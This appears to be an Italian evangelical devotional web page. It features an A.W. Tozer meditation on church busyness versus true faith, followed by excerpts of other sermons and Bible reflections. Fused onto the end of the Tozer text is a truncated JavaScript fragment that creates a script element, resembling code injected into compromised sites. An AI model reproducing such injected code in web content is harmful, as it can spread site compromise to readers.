Meditazione del giorno: L’attività non basta.

di A.W. TOZER  –  Coloro che danno avvertimenti nella chiesa non sono mai molto popolari. Devo però ancora riportare l’attenzione che la nostra smania per “attività” porta pochissimi benefici nei nostri circoli cristiani. Guardate nelle chiese, e troverete gruppi di persone salvate a metà, mezzi-santificati, carnali che conoscono più i convenevoli sociali che il Nuovo Testamento. È un dato di fatto che molti delle persone di  chiesa sono attivamente impegnati in molte attività religiose – ma non sembrano affatto vicini a Gesù nel cuore e nello spirito.

Questa enfasi religiosa moderna sull’attività mi ricorda i topi giapponesi che ho visto nelle vetrine di un negozio di animali. Essi sono chiamati topi “waltzing”, ma essi non ballano il valzer. Solo girano e girano continuamente! Molti nelle nostre chiese sperano di avere una parte in “qualcosa di grande ed emozionante.” Ma Dio ci chiama a ritornare – ritornare alla semplicità della fede; tornare alla semplicità di Gesù Cristo e della sua persona immutabile!var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Meditazione del giorno

  • NON SIATE SCHIAVI DELLE ABITUDINI
    In Devotional, Edificazione (Autori Vari)
    di OSWALD CHAMBERS  –  «Perché se queste cose si trovano e abbondano in voi, non vi renderanno né oziosi né sterili». 2 Pietro 1:8   –   Quando noi ci accorgiamo di aver preso delle buone abitudini e ci rendiamo conto di diventare migliori, dobbiamo pensare che si tratta solo di una tappa, che, se noi ci fermiamo a questo punto, acquistiamo una mentalità farisaica. Le virtù vanno praticate e vissute nella nostra vita nascosta in Cristo, in modo da diventare innate in noi e non delle abitudini coscienti. Dobbiamo essere coscienti solo delle qualità che ci mancano per poterle acquistare. Dopo di che la comunione col Padre sarà più [...continua la lettura]

Post meno Recenti

  • Una promessa per oggi: La Mia giustizia s’innalza come le montagne più alte, i miei giudizi sono profondi come il grande oceano.
    La tua giustizia s’innalza come le montagne più alte, i tuoi giudizi sono profondi come il grande oceano. O SIGNORE, tu soccorri uomini e bestie. (Salmo 36:6) –   Credo che tutta la creazione ci parla continuamente della bontà del Padre. Nella promessa di oggi, il re Davide dichiara che la giustizia di Dio si innalza come le maestose montagne della terra e i suoi giudizi sono profondi come lo è l’oceano. Nel Salmo 103:11-12 David continua questo confronto quando dichiara: “Come i cieli sono alti al di sopra della terra, così è grande la sua bontà verso quelli che lo temono. Come è lontano l’oriente dall’occidente, così ha egli allontanato da noi le nostre colpe. Se guardiamo a questo, ogni aspetto della natura ci aiuterà a comprendere la grandezza del nostro Dio. […]
  • IL RUOLO DELLA BIBBIA NELLA CHIESA (e nella vita del credente)
    La Bibbia non è una collezione di scritti umani, o solo un capolavoro letterario. Non possiamo accogliere nemmeno la teoria che la Bibbia “contiene” la Parola di Dio, ma affermiamo e crediamo che la Bibbia è l’infallibile, ispirata ed efficace Parola di Dio. Abraham Lincoln un giorno disse: “io credo che la Bibbia sia il miglior dono che Dio abbia fatto agli uomini. LA PAROLA NEL MINISTERIO DI CRISTO. Qual è il suo ruolo nella chiesa oggi? Quale deve essere? Per dare una risposta vogliamo ricorrere alla Bibbia stessa e vedere come e quanto la chiesa primitiva dava importanza alla Parola di Dio. […]
  • IL TIPO DI PREGHIERA CHE AZIONA LE RUOTE DEL RISVEGLIO
    di  SIDLOW BAXTER  –  Abbiamo bisogno di un risveglio di preghiera di intercessione tra il popolo di Dio. Non preghiamo abbastanza. Oltre ad intensificare la loro vita privata di preghiera, i cristiani dovrebbero unirsi in gruppi per aggrapparsi a Dio e promuovere un risveglio nella propria terra e in ogni altro paese. Il nostro più pressante bisogno è di chiedere a Dio di dare più potenza nella preghiera a tutti coloro che hanno a cuore una rapida evangelizzazione dei perduti. Preghiera che dev’essere forte, prevalente, piena di fede, che muove Dio, che vince l’inferno, che mette in rotta Satana, che salva i peccatori, che santifica i credenti, che esalta Cristo, che produce operai per Cristo e trova le risorse  necessarie.  Preghiera che prende tutto ciò che siamo e abbiamo, per […]
  • SINCERITA’ E TRASPARENZA
    di A. W. TOZER  Se si volesse avere un’immagine abbastanza esatta dell’umanità si potrebbe senz’altro capovolgere il sermone sul monte nel suo contrario e dire: Prego, questa è l’umanità. Perché il contrario del sermone sul monte mostra esattamente le caratteristiche che contraddistinguono la vita e il comportamento umani naturali. Nel mondo di solito non troviamo nessuna delle virtù di cui Gesù parla all’inizio del suo discorso sul monte. Anziché la povertà di spirito si trova la forma più spiccata di superbia; anziché mansuetudine governa l’arroganza; anziché la fame di giustizia si sente dire: Io sono ricco, ho tutto e non ho bisogno di niente; anziché misericordia c’è la crudeltà; anziché la purezza di cuore ci sono immaginazioni perverse; anziché […]
  • I falsi profeti all’opera oggi
      di ROBERT J. WELLS   –  In Matteo 7:15, è scritto: «Guardatevi dai falsi profeti i quali vengono a voi in vesti da pecore, ma dentro sono lupi rapaci».  Ci sono solo due vie lungo le quali gli uomini possono viaggiare: la via larga che conduce alla distruzione e la stretta via che conduce alla vita. Questo affermò Gesù Cristo, il vero profeta di Dio, il quale fece la più urgente ammonizione che si possa trovare nella Bibbia: «Entrate attraverso la porta stretta … perché stretta è la porta e angusta la via che mena alla vita, e pochi sono quelli che la trovano». Gesù sapeva che questo suo principio avrebbe suscitato nei secoli tempestosi a venire le più terribili controversie. Affinché i suoi seguaci fedeli non rimanessero senza guida Gesù li ammonì: «Guardatevi dai falsi […]
  • FAVORITI NELL’AMATO SUO FIGLIO.
    Efesini 1:6  –   i.  –  A volte ci capita di avere l’imbarazzo della scelta. E’ come se trovandoci davanti  ad uno scrigno pieno di perle o pietre preziose dovessimo sceglierne una tra le tante….!  La lettera agli Efesini è come quello scrigno: solo in questi primi sei versi dobbiamo fare uno sforzo per scegliere una delle tante perle che contiene;  scegliamo il verso sei, e in particolare le parole: favoriti nell’amato Suo Figlio. […]

Prossimi Eventi

Dai nostri Culti